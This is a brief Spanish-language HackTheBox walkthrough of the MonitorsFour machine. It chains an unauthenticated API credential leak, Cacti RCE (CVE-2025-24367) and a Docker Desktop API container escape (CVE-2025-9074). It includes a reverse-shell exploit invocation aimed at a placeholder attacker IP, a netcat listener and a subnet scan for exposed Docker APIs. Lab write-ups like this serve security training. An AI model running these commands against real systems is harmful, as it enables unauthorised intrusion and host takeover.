
Recorrido de HackTheBox MonitorsFour que cubre la filtración de credenciales, RCE de Cacti CVE-2025-24367 y escape de contenedor a root mediante la API de Docker Desktop CVE-2025-9074.
Plataforma: HackTheBox SO: Windows Estado: Retirada — walkthrough completo publicado.
Walkthrough completo: l3dsec.com/walkthroughs/monitorsfour-htb
Nmap → nginx (80) + WinRM (5985)
→ ffuf → cacti.monitorsfour.htb (Cacti)
→ endpoint de API no autenticado → credenciales
→ CVE-2025-24367 Cacti RCE → shell como www-data (Docker)
→ CVE-2025-9074 Docker Desktop API (192.168.65.x:2375)
→ montar el sistema de archivos del host → root flag
nmap -sV -sC <TARGET_IP>
nmap -sV -sC <TARGET_IP> -p-
PORT STATE SERVICE VERSION
80/tcp open http nginx
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
El fuzzing de hosts virtuales reveló cacti.monitorsfour.htb — una instancia de monitoreo de red Cacti.
Un endpoint de API no autenticado en el dominio principal expone datos de cuentas de usuario, incluyendo hashes de contraseñas MD5:
curl -s "http://monitorsfour.htb/user?token=0"
El hash MD5 se descifró inmediatamente — proporciona credenciales válidas para Cacti.
Instancia de Cacti vulnerable a RCE autenticado a través de la funcionalidad Graph Template:
nc -lvnp 9001
sudo python3 exploit.py \
-url http://cacti.monitorsfour.htb \
-u marcus \
-p <password> \
-i <ATTACKER_IP> \
-l 9001
Shell como www-data dentro de un contenedor Docker. User flag en /home/marcus/user.txt.
El socket de Docker no está montado. Docker Desktop expone su Engine API sin autenticación en la subred interna 192.168.65.0/24:
# Scan for open Docker API
for i in $(seq 1 254); do
(curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2>/dev/null \
| grep -q "ApiVersion" && echo "192.168.65.$i:2375 OPEN") &
done; wait
Se creó un contenedor a través de la API que monta la unidad C:\ del host, y luego se leyó la root flag desde C:\Users\Administrator\Desktop\root.txt.
| Flag | Value |
|---|---|
| User | redacted |
| Root | redacted |
Solo con fines educativos. Prueba únicamente sistemas que poseas o para los que tengas permiso explícito por escrito para probar.